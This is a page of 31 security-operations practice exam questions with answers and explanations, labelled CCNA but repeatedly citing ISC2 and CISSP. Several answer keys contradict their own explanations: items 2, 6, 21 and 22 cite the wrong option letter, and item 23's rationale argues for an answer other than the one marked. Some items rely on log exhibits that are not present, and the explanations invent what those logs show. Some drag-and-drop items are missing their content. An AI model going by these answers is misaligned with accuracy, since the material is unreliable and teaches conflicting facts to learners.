CCNA Security Operations Questions

68 questions · Security Operations topic · All types, answers revealed

1
MCQhard

During an incident response, the team identifies that the attacker gained access through a compromised service account with domain admin privileges. Which of the following steps should be taken FIRST to contain the incident?

A.Isolate all affected systems from the network.
B.Reset all user passwords.
C.Perform a full forensic analysis before any action.
D.Disable the compromised account and revoke its tokens.
AnswerD

Directly removes the attacker's foothold.

Why this answer

Disabling the compromised account and revoking its tokens (e.g., Kerberos TGTs via `Set-ADAccountControl -Disable` and clearing cached tickets) immediately stops the attacker's current authentication and lateral movement capabilities. This is the fastest containment step because the service account with Domain Admin privileges is the direct vector; isolating systems or resetting all passwords is slower and may not address active token reuse.

Exam trap

ISC2 often tests the principle that containment must be immediate and targeted; candidates mistakenly choose isolation or forensic analysis first, forgetting that the compromised account is the root cause and that tokens can outlive password resets.

How to eliminate wrong answers

Option A is wrong because isolating all affected systems can disrupt business operations and may not stop the attacker if they have already established persistence via the compromised account or tokens on other systems. Option B is wrong because resetting all user passwords is a broad, time-consuming step that does not immediately revoke the attacker's active Kerberos tickets or NTLM hashes for the compromised service account, leaving a window for continued access. Option C is wrong because performing a full forensic analysis before any action violates the incident response priority of containment over evidence preservation; the attacker could cause further damage or destroy evidence during the delay.

2
MCQmedium

A SOC analyst receives an alert for a high number of outbound connections to a known malicious IP. Which action should be taken first?

A.Notify management
B.Block the IP at the firewall
C.Run an antivirus scan
D.Isolate the affected host
AnswerD

Prevents further data exfiltration and contains the threat.

Why this answer

Option A is correct because isolating the host prevents further data exfiltration and allows for safe investigation. Blocking the IP may stop the traffic but the host remains compromised. Antivirus and notification are secondary steps.

3
MCQmedium

During a security incident, the incident response team identifies that an attacker exfiltrated data via a compromised service account. Which of the following is the BEST immediate step to contain the incident?

A.Notify law enforcement
B.Enable detailed auditing on the account
C.Revoke the service account's privileges
D.Change the password of the service account
AnswerC

Revoking privileges immediately stops unauthorized access.

Why this answer

Option C is correct because revoking the compromised account's privileges stops further access. Option A is wrong because changing the password may not be effective if the attacker has established persistence. Option B is wrong while important, auditing alone doesn't stop ongoing exfiltration.

Option D is wrong because notifying law enforcement is a later step, not immediate containment.

4
MCQmedium

During a vulnerability scan, a security analyst discovers that a web server is running an outdated version of Apache with known remote code execution vulnerabilities. The server is in production and cannot be patched immediately due to dependency conflicts. What is the best compensating control to reduce risk while a permanent fix is developed?

A.Disable all unnecessary modules and services on the server
B.Implement a web application firewall (WAF) to block known attack patterns
C.Enable detailed logging and alerting for the server
D.Isolate the server in a separate VLAN with strict ACLs
AnswerB

A WAF can detect and block exploit attempts, providing virtual patching until the software is updated.

Why this answer

A Web Application Firewall (WAF) is the best compensating control because it can inspect HTTP/HTTPS traffic at the application layer (Layer 7) and block known attack patterns targeting the outdated Apache version, such as specific payloads for CVE-2017-9798 or CVE-2021-41773. Unlike other options, a WAF provides virtual patching without modifying the vulnerable server, directly mitigating the remote code execution risk while a permanent fix is developed.

Exam trap

ISC2 often tests the distinction between detective controls (logging/alerting) and preventive controls (WAF), leading candidates to choose logging because it seems proactive, but it fails to reduce risk in real time.

How to eliminate wrong answers

Option A is wrong because disabling unnecessary modules and services reduces the attack surface but does not block the specific remote code execution exploits that target the vulnerable Apache core or remaining enabled modules. Option C is wrong because enabling detailed logging and alerting only improves detection and incident response, not prevention; it does not reduce the likelihood of exploitation. Option D is wrong because isolating the server in a separate VLAN with strict ACLs limits network-level exposure but does not prevent application-layer attacks (e.g., HTTP requests carrying exploit payloads) from reaching the vulnerable Apache service.

5
MCQmedium

You are a security analyst at a financial institution. The company has a hybrid infrastructure with on-premises servers and AWS cloud. The on-premises network uses a SIEM that aggregates logs from all sources. Recently, the SIEM has been generating a high volume of alerts for failed SSH login attempts from an internal IP (10.10.50.100) to multiple Linux servers. The IP belongs to a jump box used by system administrators. Upon investigation, you find that the jump box is running a hardened OS, and only authorized admins can access it via SSH key authentication. However, the failed login attempts show usernames like 'root', 'admin', 'test', which are not valid accounts on the target servers. The attempts occur every 5 seconds around the clock. There are no successful logins from that IP. The jump box has the latest patches and antivirus. What should you do FIRST?

A.Add the usernames 'root', 'admin', 'test' to the target servers' password blacklist
B.Isolate the jump box from the network immediately and conduct a forensic analysis
C.Ignore the alerts because the usernames are invalid and the jump box is hardened
D.Run a full antivirus scan on the jump box and check for malware
AnswerB

The jump box is likely compromised; isolating it stops the attack and allows for investigation.

Why this answer

The jump box is exhibiting automated, high-frequency failed login attempts with non-existent usernames, which is a classic indicator of a compromised host being used as an attack launch point—even if the OS appears hardened and AV shows clean. The first priority in incident response is containment; isolating the jump box prevents further potential lateral movement or data exfiltration while preserving forensic evidence. A forensic analysis is then required to determine the root cause (e.g., a hidden backdoor, credential theft, or kernel-level rootkit) before any remediation steps.

Exam trap

The trap here is that candidates focus on the 'hardened OS' and 'no successful logins' as signs of safety, but CISSP expects you to recognize that anomalous outbound attack traffic from an internal asset is a containment trigger, not a false positive.

How to eliminate wrong answers

Option A is wrong because adding usernames to a password blacklist does not address the source of the attack—the jump box itself is likely compromised, and blacklisting usernames on target servers is a reactive, non-containment measure that ignores the real threat. Option C is wrong because ignoring alerts based on invalid usernames and a hardened OS is a dangerous assumption; automated brute-force or credential-stuffing attempts from an internal jump box indicate a breach of trust, and the absence of successful logins does not rule out other malicious activities (e.g., lateral movement via other protocols). Option D is wrong because running an antivirus scan is insufficient—modern attackers use fileless malware, rootkits, or living-off-the-land binaries that AV may miss, and scanning should only occur after containment and forensic imaging to avoid altering evidence.

6
MCQeasy

Which of the following is a key requirement for an effective backup strategy to ensure data can be recovered after a ransomware attack?

A.Incremental backups are performed monthly.
B.Backups use the same credentials as the production environment.
C.Backups are stored on the same network as production.
D.Backups are encrypted and stored offline or air-gapped.
AnswerD

Immutable backups that cannot be modified or encrypted by ransomware.

Why this answer

Option B is correct because backups that are encrypted and stored offline or air-gapped are protected from encryption by ransomware. Other options would leave backups vulnerable.

7
MCQmedium

Based on the log entry from an authentication server, which immediate action should the security team take to reduce risk?

A.Block the source IP 10.0.0.5 in the firewall.
B.Change the SSH port to a non-standard port.
C.Disable root login via SSH.
D.Increase the logging verbosity for SSH.
AnswerC

Eliminates possibility of direct root brute force.

Why this answer

The log entry shows repeated failed SSH authentication attempts as root from an internal IP (10.0.0.5). Disabling root login via SSH (Option C) directly eliminates the ability to authenticate as the root user over SSH, which is a fundamental security best practice per CISSP and industry standards (e.g., CIS benchmarks). This reduces the risk of brute-force attacks targeting the root account, as an attacker would need to guess both a valid username and password instead of targeting a known privileged account.

Exam trap

ISC2 often tests the distinction between reactive controls (blocking an IP) and preventive controls (disabling root login), leading candidates to choose the immediate but less effective action of blocking the source IP instead of addressing the systemic vulnerability.

How to eliminate wrong answers

Option A is wrong because blocking the source IP 10.0.0.5 in the firewall is a reactive, temporary measure that does not address the root cause; the attacker could easily spoof or change IPs, and the internal IP may belong to a legitimate compromised host that needs remediation, not permanent blocking. Option B is wrong because changing the SSH port to a non-standard port is security by obscurity and does not prevent brute-force attacks; attackers routinely scan all ports, and the root login vulnerability remains exploitable. Option D is wrong because increasing logging verbosity for SSH only improves visibility and forensic capability but does not reduce the immediate risk of unauthorized root access; it is a detective control, not a preventive one.

8
MCQeasy

Which of the following is a best practice for managing privileged user accounts?

A.All users should be granted admin rights by default.
B.Use separate administrative accounts for non-privileged tasks.
C.Passwords for privileged accounts should never be changed.
D.Shared generic accounts should be used to avoid multiple credentials.
AnswerB

Ensures admin accounts are only used for privileged actions.

Why this answer

Option B is correct because the principle of least privilege dictates that administrative accounts should only be used for privileged tasks, not for routine activities like email or web browsing. Using separate, non-privileged accounts for daily work reduces the risk of credential theft and limits the attack surface if a user's session is compromised. This practice is a core component of privileged access management (PAM) and aligns with NIST SP 800-53 AC-6.

Exam trap

The trap here is that candidates often confuse 'using separate accounts' with 'using separate passwords' or think that shared accounts are acceptable for convenience, but the CISSP exam emphasizes individual accountability and the principle of least privilege as non-negotiable security controls.

How to eliminate wrong answers

Option A is wrong because granting all users admin rights by default violates the principle of least privilege and dramatically increases the risk of malware installation, unauthorized system changes, and lateral movement by attackers. Option C is wrong because passwords for privileged accounts must be changed regularly (or rotated after each use via a PAM solution) to mitigate the risk of credential compromise and limit the window of exposure; never changing them is a direct violation of account management best practices. Option D is wrong because shared generic accounts eliminate individual accountability, make auditing impossible, and violate the requirement for non-repudiation; each administrator should have a unique, named privileged account to enable precise logging and forensic analysis.

9
Multi-Selecthard

Which THREE of the following are essential components of an effective incident response plan according to NIST SP 800-61?

Select 3 answers
A.Preparation
B.Notification
C.Detection and Analysis
D.Vulnerability scanning
E.Containment, Eradication, and Recovery
AnswersA, C, E

Foundational phase.

Why this answer

Option A is correct because NIST SP 800-61 defines the incident response lifecycle as having four phases: Preparation, Detection and Analysis, Containment/Eradication/Recovery, and Post-Incident Activity. Preparation is the foundational phase that establishes the incident response capability, including creating policies, forming a team, and acquiring necessary tools before any incident occurs.

Exam trap

The trap here is that candidates often confuse Notification as a formal phase because it appears in many incident response frameworks (e.g., SANS PICERL), but NIST SP 800-61 does not list it as a core phase; instead, it is a task within other phases.

10
Multi-Selectmedium

Which TWO of the following are examples of detective controls?

Select 2 answers
B.CCTV surveillance
D.Security awareness training
E.Intrusion detection system (IDS)
AnswersB, E

Detects physical security breaches.

Why this answer

CCTV surveillance is a detective control because it records events for later review, enabling the detection of unauthorized activities after they occur. It does not prevent or deter access in real-time, but instead provides evidence for incident investigation and forensic analysis. This aligns with the detective control category in security operations, which focuses on identifying and logging violations post-facto.

Exam trap

The trap here is confusing preventive controls (like ACLs and firewalls) with detective controls, as candidates often misclassify any technology that 'monitors' as detective, but ACLs and firewalls are inherently preventive because they block or allow access in real-time, not after the fact.

11
Multi-Selectmedium

Which THREE of the following are best practices for securing a data center's physical access?

Select 3 answers
A.Implement multi-factor authentication at entry points
B.Install a mantrap at the main entrance
C.Use only biometric readers for all doors
D.Allow visitors to access the lobby without an escort
E.Use CCTV with retention policies for monitoring
AnswersA, B, E

Combining something you know, have, or are increases security.

Why this answer

Multi-factor authentication (MFA) at entry points combines two or more independent credentials (e.g., smart card and PIN, or biometric and token) to verify identity. This significantly reduces the risk of unauthorized access because compromising a single factor (e.g., a lost card) is insufficient to gain entry. MFA aligns with the defense-in-depth principle and is a core physical security control for sensitive areas.

Exam trap

The trap here is that candidates might think biometric-only access (Option C) is inherently more secure, but CISSP emphasizes layered security and the need for multi-factor authentication to avoid single-factor vulnerabilities.

12
MCQhard

Based on the firewall log entry, what is the most likely reason the connection was denied?

A.The outbound connection was blocked by an access control list.
B.The connection was denied due to malicious signature detection.
C.The destination IP address is blacklisted.
D.The source port 54321 is a prohibited port.
AnswerA

The entry shows denial by access-group 'outside-in', which is applied to inbound on outside interface but blocks outbound traffic from inside.

Why this answer

The firewall log entry shows an outbound connection attempt from source IP 10.0.0.5:54321 to destination IP 203.0.113.50:80 that was denied. Firewalls typically evaluate outbound traffic against access control lists (ACLs) before any deeper inspection. Since the log does not indicate any signature match or blacklist hit, the most straightforward reason is that an ACL rule explicitly blocked this outbound connection.

Exam trap

The trap here is that candidates often assume a denied connection must be due to a security feature like blacklisting or signature detection, but the log lacks any such indicators, making a simple ACL block the most logical answer.

How to eliminate wrong answers

Option B is wrong because malicious signature detection is a function of an intrusion prevention system (IPS) or next-generation firewall (NGFW) with deep packet inspection, and the log entry does not reference any signature ID or alert. Option C is wrong because a blacklisted destination IP would typically be logged with a specific reason such as 'blacklist hit' or 'reputation block', which is absent here. Option D is wrong because source ports above 1024 (ephemeral ports) are not prohibited by standard firewall policies; only well-known ports (0-1023) or specific ports might be restricted, and 54321 is a high ephemeral port commonly used by client applications.

13
Drag & Dropmedium

Drag and drop the steps for implementing mandatory access control (MAC) in a secure system in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

MAC implementation: define labels, assign clearances, assign classifications, configure monitor, test.

14
Multi-Selecteasy

Which TWO of the following are valid reasons for conducting a business impact analysis (BIA)?

Select 2 answers
A.To identify vulnerabilities in the network infrastructure
B.To perform a full security audit of the organization
C.To create a list of all hardware and software assets
D.To identify critical business processes and their dependencies
E.To determine the maximum acceptable outage time for each process
AnswersD, E

The BIA identifies which processes are most important to the organization.

Why this answer

Option D is correct because a Business Impact Analysis (BIA) is specifically designed to identify critical business processes and their dependencies on resources such as personnel, systems, and data. This identification is foundational for prioritizing recovery strategies in business continuity planning, as it directly links operational needs to technical infrastructure.

Exam trap

The trap here is that candidates confuse the BIA with technical assessments like vulnerability scans or asset inventories, but the BIA is exclusively a business-oriented analysis of process criticality and outage tolerance, not a technical audit or inventory exercise.

15
Multi-Selecthard

Which THREE of the following are required components of a Business Continuity Plan (BCP)?

Select 3 answers
A.Alternate facility location
B.Contact list of key stakeholders
C.Detailed technical recovery procedures
D.Marketing strategy
E.List of all employees' home addresses
AnswersA, B, C

Required if primary facility is unavailable.

Why this answer

An alternate facility location is a required component of a Business Continuity Plan (BCP) because it provides a pre-arranged site where critical operations can resume if the primary facility becomes unusable. This ensures continuity of operations within the defined Recovery Time Objective (RTO) and Recovery Point Objective (RPO). Without a designated alternate site, the organization would lack a physical fallback, making the BCP incomplete.

Exam trap

The trap here is that candidates often confuse BCP components with Disaster Recovery Plan (DRP) details, assuming detailed technical recovery procedures are always part of a BCP, when in fact they belong to the DRP, while the BCP focuses on strategic continuity elements like alternate facilities and stakeholder contacts.

16
MCQeasy

An organization is implementing a bring-your-own-device (BYOD) policy. Which security control should be enforced to ensure that only compliant devices can access corporate resources?

A.Using a VPN concentrator
B.Requiring strong passwords
C.Implementing network access control (NAC)
D.Enabling full disk encryption
AnswerC

NAC checks device posture before network access.

Why this answer

Network access control (NAC) is the correct control because it evaluates device posture (e.g., OS patch level, antivirus status, disk encryption) against a compliance policy before granting network access. NAC can quarantine non-compliant devices to a remediation VLAN or deny access entirely, ensuring only trusted endpoints reach corporate resources. This is distinct from generic encryption or authentication controls, as NAC enforces a dynamic, policy-based admission decision at the network layer.

Exam trap

The trap here is that candidates often confuse authentication controls (like strong passwords or VPN) with device compliance enforcement, but NAC is the only option that actively checks and enforces a security posture before granting network access.

How to eliminate wrong answers

Option A is wrong because a VPN concentrator only provides encrypted tunneling for remote access and does not evaluate device compliance or posture before allowing connectivity. Option B is wrong because requiring strong passwords addresses authentication but does not verify that the device itself meets security baselines (e.g., patching, encryption, or jailbreak status). Option D is wrong because full disk encryption protects data at rest on the device but does not control network access or enforce compliance checks at the point of connection.

17
Multi-Selecthard

Which THREE of the following are common indicators of a privilege escalation attack? (Choose three.)

Select 3 answers
A.Creation of new user accounts with administrative privileges
B.Higher-than-normal network traffic
C.System performance degradation
D.Modification of system files or registry keys
E.Unusual processes running under elevated privileges
AnswersA, D, E

Often used to maintain persistence after escalation.

Why this answer

Option A is correct because the creation of new user accounts with administrative privileges is a classic post-exploitation technique used by attackers to establish persistent elevated access. After successfully exploiting a vulnerability to gain initial elevated privileges, an attacker often creates a backdoor account (e.g., via `net user /add` and `net localgroup Administrators /add` on Windows, or `useradd -G wheel` on Linux) to maintain control even if the original exploit vector is patched. This indicator is directly tied to privilege escalation as it demonstrates an unauthorized elevation from a lower-privileged context to full administrative control.

Exam trap

ISC2 often tests the distinction between general attack symptoms (like network traffic spikes or performance drops) and specific indicators that directly evidence the privilege escalation technique itself, leading candidates to over-select broad, non-specific options.

18
MCQeasy

Which of the following is a key principle of privileged access management (PAM)?

A.Use shared accounts for simplicity
B.Monitor and audit privileged account usage
C.Grant all users administrative rights for efficiency
D.Disable logging for performance
AnswerB

Key to detecting misuse and ensuring accountability.

Why this answer

Privileged Access Management (PAM) is centered on the principle of least privilege and the need to control, monitor, and audit the use of privileged accounts (e.g., root, domain admin). Option B is correct because continuous monitoring and auditing of privileged account usage is a foundational PAM requirement, enabling detection of misuse, lateral movement, and privilege escalation. Without auditing, organizations cannot enforce accountability or respond to security incidents involving high-risk accounts.

Exam trap

The trap here is that candidates may confuse PAM with general identity management and choose 'shared accounts for simplicity' (Option A), failing to recognize that PAM specifically enforces individual accountability and credential rotation, not shared access.

How to eliminate wrong answers

Option A is wrong because shared accounts violate non-repudiation and accountability, making it impossible to attribute actions to a specific individual, which is a core PAM goal. Option C is wrong because granting all users administrative rights directly contradicts the principle of least privilege and dramatically increases the attack surface for privilege escalation and ransomware. Option D is wrong because disabling logging for performance eliminates the audit trail required for forensic analysis and compliance, and PAM systems rely on detailed logging (e.g., session recording, keystroke logging) to detect anomalies.

19
Matchingmedium

Match each business continuity term to its definition.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Maximum acceptable downtime after a disaster

Maximum acceptable data loss measured in time

Average time between system failures

Average time to repair a failed system

Service level agreement defining performance metrics

Why these pairings

These metrics are critical for continuity planning.

20
MCQhard

An organization implements a data loss prevention (DLP) solution. Which action is most effective for protecting data at rest on endpoint devices?

A.Encryption of files
B.User awareness training
C.USB port blocking
D.Network DLP monitoring
AnswerA

Directly protects data at rest on endpoints.

Why this answer

Encryption of files directly protects data at rest on endpoint devices by rendering the data unreadable without the appropriate decryption key. This ensures that even if an endpoint is lost, stolen, or accessed by an unauthorized user, the data remains confidential. DLP solutions often integrate with file-level encryption (e.g., BitLocker, FileVault, or EFS) to enforce policy-based encryption on sensitive files at rest.

Exam trap

ISC2 often tests the distinction between data states (at rest, in motion, in use) and the specific controls that apply to each; the trap here is that candidates confuse network DLP (data in motion) with endpoint DLP (data at rest), or they select a general security control like user training instead of the direct technical control for data at rest.

How to eliminate wrong answers

Option B is wrong because user awareness training is a preventive administrative control that reduces human error but does not provide a technical mechanism to protect data at rest on endpoints; it addresses behavior, not the data itself. Option C is wrong because USB port blocking is a physical security control that prevents data exfiltration via removable media but does not protect data already stored on the endpoint's hard drive; it addresses data in motion, not data at rest. Option D is wrong because network DLP monitoring inspects data in transit across the network, not data stored locally on endpoint devices; it is effective for data in motion but cannot enforce protection for data at rest on the endpoint.

21
MCQeasy

You are the security manager for a manufacturing company with a large facility that houses production servers and sensitive intellectual property. The facility has a single physical entrance that uses a card reader for access control. During a routine audit, you find that the door prop alarm has been bypassed by taping a magnet to the sensor, allowing the door to stay open without triggering an alert. The security guard station is located 200 feet away and does not have a direct line of sight to the door. Which control should you implement FIRST to prevent unauthorized physical access?

A.Replace the card reader with a biometric fingerprint scanner.
B.Increase the frequency of security patrols around the entrance.
C.Implement a mantrap with two interlocking doors at the entrance.
D.Install a video surveillance camera to monitor the entrance.
AnswerC

A mantrap physically prevents unauthorized access and tailgating.

Why this answer

Option B is the most effective and immediate physical control: a mantrap prevents tailgating and ensures only one person enters per card swipe. Option A (video camera) is detective, not preventive. Option C (security patrol) is resource-intensive and reactive.

Option D (biometric reader) adds authentication but does not prevent door propping or tailgating.

22
MCQeasy

A medium-sized financial services company has a flat network topology with no segmentation between the corporate LAN and the server farm. The security team recently deployed a host-based intrusion detection system (HIDS) on all critical servers. Over the past week, the HIDS has generated multiple high-severity alerts indicating outbound connections from a database server to an external IP address in a foreign country, occurring every hour and lasting only a few seconds. The database server contains sensitive customer data. The company's incident response plan (IRP) has not been updated in two years, and the CISO wants to ensure a response that minimizes business disruption while protecting data. The IT team is small, and the security analyst on duty suspects a data exfiltration attempt but is unsure. What should the analyst do FIRST?

A.Disconnect the database server from the network at the switch port and preserve the system state for forensic analysis
B.Run a full antivirus scan on the database server and update the HIDS signatures
C.Review the firewall logs to identify all external IPs the server has contacted
D.Immediately notify the company's legal department and public relations team
AnswerA

Isolating the server stops active data exfiltration and preserves evidence for investigation.

Why this answer

Option B is correct because isolating the server (disconnecting from the network) stops any ongoing data exfiltration immediately while preserving forensic evidence. Option A may trigger more data loss; Option C is premature before containment; Option D is important but delays containment.

23
MCQhard

An AWS security engineer is reviewing the above S3 bucket policy. What is the net effect of this policy on requests to read objects in the 'confidential' folder?

A.Only IPs in 10.0.0.0/8 but outside 10.100.0.0/16 can read confidential objects
B.No IPs can read confidential objects because the Deny applies to all
C.All IPs in the 10.0.0.0/8 range can read confidential objects
D.Only IPs in 10.100.0.0/16 can read confidential objects
AnswerD

The Deny statement allows only IPs in 10.100.0.0/16 (since NotIpAddress denies others), and the Allow gives GetObject permission but is overridden for others.

Why this answer

The S3 bucket policy grants read access to the 'confidential' folder for all principals within the 10.0.0.0/8 IP range, but then explicitly denies access to IPs within the 10.100.0.0/16 subnet. Because explicit Deny overrides any Allow, the net effect is that only IPs in 10.0.0.0/8 that are NOT in 10.100.0.0/16 can read objects. This matches option D.

Exam trap

The trap here is that candidates may misinterpret the Deny as applying to all IPs (option B) or fail to recognize that the Deny only blocks the specific subnet, leaving the rest of the 10.0.0.0/8 range allowed.

How to eliminate wrong answers

Option A is wrong because it reverses the logic: the Deny applies to 10.100.0.0/16, not to the rest of 10.0.0.0/8. Option B is wrong because the Deny does not apply to all IPs; it only applies to the specific subnet 10.100.0.0/16, so IPs outside that subnet but within 10.0.0.0/8 are still allowed. Option C is wrong because it ignores the explicit Deny for the 10.100.0.0/16 range, which overrides the Allow for those IPs.

24
MCQmedium

A company is designing a recovery site for its critical database. The recovery time objective (RTO) is 2 hours, and the recovery point objective (RPO) is 15 minutes. Which of the following replication strategies is BEST suited?

A.Asynchronous replication to a warm site
B.Full backups every 24 hours to a cold site
C.Weekly snapshots to a warm site
D.Synchronous replication to a hot site
AnswerD

Sync replication meets RPO and RTO.

Why this answer

Synchronous replication writes data to both the primary and the hot site simultaneously, ensuring zero data loss upon failover. With an RPO of 15 minutes, synchronous replication can meet this requirement because it commits transactions at both sites before acknowledging completion. A hot site is fully configured and ready to take over within the RTO of 2 hours, making this combination the best fit.

Exam trap

The trap here is that candidates often choose asynchronous replication (Option A) thinking it is sufficient for a 15-minute RPO, but they overlook that asynchronous replication can have variable lag that may exceed the RPO, especially under high write loads or network congestion.

How to eliminate wrong answers

Option A is wrong because asynchronous replication introduces a replication lag that can exceed the 15-minute RPO, as data is sent in batches and may not be fully current at the recovery site. Option B is wrong because full backups every 24 hours to a cold site cannot meet the 15-minute RPO (potential data loss of up to 24 hours) and the cold site would require significant time to restore, likely exceeding the 2-hour RTO. Option C is wrong because weekly snapshots provide a recovery point that is up to 7 days old, far exceeding the 15-minute RPO, and a warm site may require additional configuration time that could jeopardize the 2-hour RTO.

25
MCQhard

A security engineer is designing a new SIEM correlation rule to detect potential data exfiltration. The rule should trigger when a single internal host sends more than 10 MB of data to an external IP address within a 5-minute window, but only if the external IP is not on a whitelist of known business partners. Which approach best minimizes false positives while ensuring effective detection?

A.Apply the rule to all internal hosts with the same threshold
B.Trigger only when the destination IP is in a threat intelligence feed of known malicious IPs
C.Use a baseline of normal traffic per host and trigger only when the volume exceeds the baseline by a significant margin
D.Set a static threshold of 10 MB for all hosts, but exclude traffic to common cloud storage providers
AnswerC

Baselines allow the rule to adapt to each host's typical behavior, reducing false positives while detecting anomalies.

Why this answer

Option C is correct because using a baseline of normal traffic per host adapts to different users' behaviors, reducing false positives from legitimate large transfers. Option A is wrong because applying the rule to all internal hosts would generate many false positives from servers that routinely transfer large files. Option B is wrong because a static threshold does not account for varying normal usage.

Option D is wrong because excluding only known partner IPs may miss exfiltration to unknown but legitimate external services.

26
MCQhard

An organization discovers that an employee has been using a personal cloud storage account to share confidential files. After revoking access, what is the NEXT best step to prevent recurrence?

A.Block access to all cloud storage sites
B.Deploy a data loss prevention (DLP) solution
C.Discipline the employee
D.Retrain all employees on data handling policy
AnswerB

DLP provides ongoing protection.

Why this answer

Deploying a Data Loss Prevention (DLP) solution is the next best step because it provides automated, policy-based monitoring and control of data in motion, at rest, and in use. DLP can inspect content for sensitive patterns (e.g., credit card numbers, proprietary file headers) and block unauthorized transfers to personal cloud storage, addressing the root cause of the incident rather than relying on manual enforcement.

Exam trap

The trap here is that candidates often choose retraining (D) because it seems like a proactive people-focused control, but the CISSP emphasizes that technical controls (like DLP) are necessary to enforce policy and prevent recurrence, especially after a security incident involving data exfiltration.

How to eliminate wrong answers

Option A is wrong because blocking all cloud storage sites is an overly restrictive, reactive measure that can hinder legitimate business operations and is easily bypassed by employees using encrypted tunnels or alternative services. Option C is wrong because disciplining the employee addresses the individual but does not implement a technical control to prevent recurrence across the organization. Option D is wrong because retraining alone is insufficient; without technical enforcement, employees may still inadvertently or deliberately violate policy, and training does not detect or block future violations in real time.

27
Multi-Selectmedium

Your organization is forming an incident response team (IRT). According to NIST SP 800-61, which TWO roles are considered core to the incident response team?

Select 2 answers
A.Public Relations
B.Technical Lead
C.Manager
D.Legal Counsel
E.Human Resources
AnswersB, C

The technical lead drives forensic analysis and containment, a core role.

Why this answer

NIST SP 800-61 Rev. 2 identifies the Team Manager and the Technical Lead as core roles within an incident response team. The Manager oversees the response process, allocates resources, and coordinates communication, while the Technical Lead drives the technical analysis, containment, and eradication efforts. These two roles are essential for both strategic direction and hands-on technical execution during an incident.

Exam trap

The trap here is that candidates often confuse 'supporting roles' (like PR, Legal, HR) with 'core roles,' but NIST SP 800-61 strictly limits core IRT to Manager and Technical Lead to ensure rapid, focused technical response without bureaucratic delays.

28
MCQeasy

Refer to the exhibit. What is the most likely cause of the denied traffic?

A.The firewall rule has a typo
B.The source IP is attempting a port scan
C.The inside host is down
D.The destination port is not allowed
AnswerB

Multiple source ports to same destination indicates scanning behavior.

Why this answer

The exhibit shows a firewall log where traffic from a single source IP (10.0.0.2) to a single destination IP (192.168.1.10) is denied on multiple different destination ports (e.g., 22, 80, 443) within a short time window. This pattern of sequential probes to distinct ports is characteristic of a port scan, which firewalls often detect and block as a reconnaissance attempt. The firewall rule is likely configured to deny such scanning behavior, not just a single port or typo.

Exam trap

The trap here is that candidates see multiple denied ports and assume the destination port is not allowed, missing the contextual clue of sequential probes from one source that indicates a port scan rather than a simple access control list issue.

How to eliminate wrong answers

Option A is wrong because a typo in a firewall rule would typically cause consistent denial for all traffic matching that rule, not a pattern of multiple port attempts from the same source. Option C is wrong because if the inside host were down, the firewall would likely show no response or a timeout, not explicit denies for multiple ports. Option D is wrong because the log shows denies on several different ports (22, 80, 443), indicating the issue is not a single disallowed port but a broader pattern of scanning.

29
MCQmedium

A company uses a SIEM to correlate logs from multiple sources. Which log source is most critical for detecting privilege escalation attacks?

A.Authentication logs
B.DNS logs
C.Firewall logs
D.Web server logs
AnswerA

Authentication logs contain login attempts and account changes indicative of privilege escalation.

Why this answer

Authentication logs are most critical for detecting privilege escalation attacks because they record user identity changes, such as the use of 'su' or 'sudo' commands, and account modifications like group membership changes. A SIEM can correlate these events with other logs to identify anomalous privilege transitions, such as a standard user suddenly acquiring administrative rights, which is a hallmark of privilege escalation.

Exam trap

The trap here is that candidates often choose firewall logs or DNS logs because they associate them with detecting attacks in general, but the question specifically targets privilege escalation, which requires logs that capture user identity and privilege changes, not network-level events.

How to eliminate wrong answers

Option B (DNS logs) is wrong because DNS logs primarily track domain name resolution queries and are useful for detecting command-and-control (C2) traffic or data exfiltration, not direct privilege escalation events. Option C (Firewall logs) is wrong because firewall logs record network traffic allowed or blocked based on IP addresses and ports, which can indicate lateral movement but do not capture the user-level account changes or privilege transitions that define privilege escalation. Option D (Web server logs) is wrong because web server logs record HTTP requests and responses, which are valuable for detecting web application attacks like SQL injection or cross-site scripting, but they do not directly log operating system-level privilege changes or authentication events.

30
MCQmedium

A network administrator finds the above log entry. The source IP 192.168.1.10 is a user workstation. What does this log entry indicate?

A.An external host attempted to connect to the workstation on port 80
B.The firewall detected an intrusion attempt from the workstation
C.The workstation attempted to access a web server on the internet and the traffic was blocked by an inbound ACL
D.The workstation successfully connected to a web server on the internet
AnswerC

The ACL 'OUTSIDE_IN' is applied to the outside interface and denied the traffic.

Why this answer

Option C is correct because the log entry shows a packet from source IP 192.168.1.10 (the workstation) to a destination IP on the internet with destination port 80 (HTTP), and the action taken by the firewall is 'denied' by an inbound ACL. In firewall terminology, an inbound ACL filters traffic entering an interface; here, the return traffic from the web server to the workstation is being blocked by the inbound ACL on the external interface, meaning the workstation's outbound request was allowed but the response was denied, indicating the workstation attempted to access a web server but the traffic was blocked.

Exam trap

ISC2 often tests the distinction between inbound and outbound ACLs, and the trap here is that candidates mistakenly think the source IP indicates the direction of the attack, leading them to choose Option A, when in fact the source IP is the internal workstation and the ACL is blocking the return traffic from the external web server.

How to eliminate wrong answers

Option A is wrong because the source IP 192.168.1.10 is a private RFC 1918 address, which cannot be a source from an external host; the log shows the workstation as the source, not an external host attempting to connect to it. Option B is wrong because the log entry does not indicate any intrusion detection signature or alert; it simply shows a denied packet based on an ACL rule, which is a standard firewall operation, not an intrusion detection system (IDS) event. Option D is wrong because the log explicitly shows the action as 'denied', meaning the traffic was blocked, not successfully connected.

31
MCQeasy

Which of the following is the PRIMARY purpose of a business impact analysis (BIA) in business continuity planning?

A.Identify critical business functions and dependencies
B.Develop and test the continuity plan
C.Determine recovery time objectives (RTO) and recovery point objectives (RPO)
D.Create the business continuity plan document
AnswerA

BIA focuses on impact and prioritization.

Why this answer

The primary purpose of a business impact analysis (BIA) is to identify critical business functions and their dependencies on resources such as personnel, systems, data, and third-party services. This identification drives all subsequent continuity planning by quantifying the impact of disruptions and establishing the basis for recovery strategies. Without a BIA, recovery objectives and plans would be based on assumptions rather than empirical data about operational priorities.

Exam trap

The trap here is that candidates confuse the BIA's primary purpose with its outputs (RTO/RPO), but the BIA is fundamentally about identifying what is critical and why, not setting the numerical targets themselves.

How to eliminate wrong answers

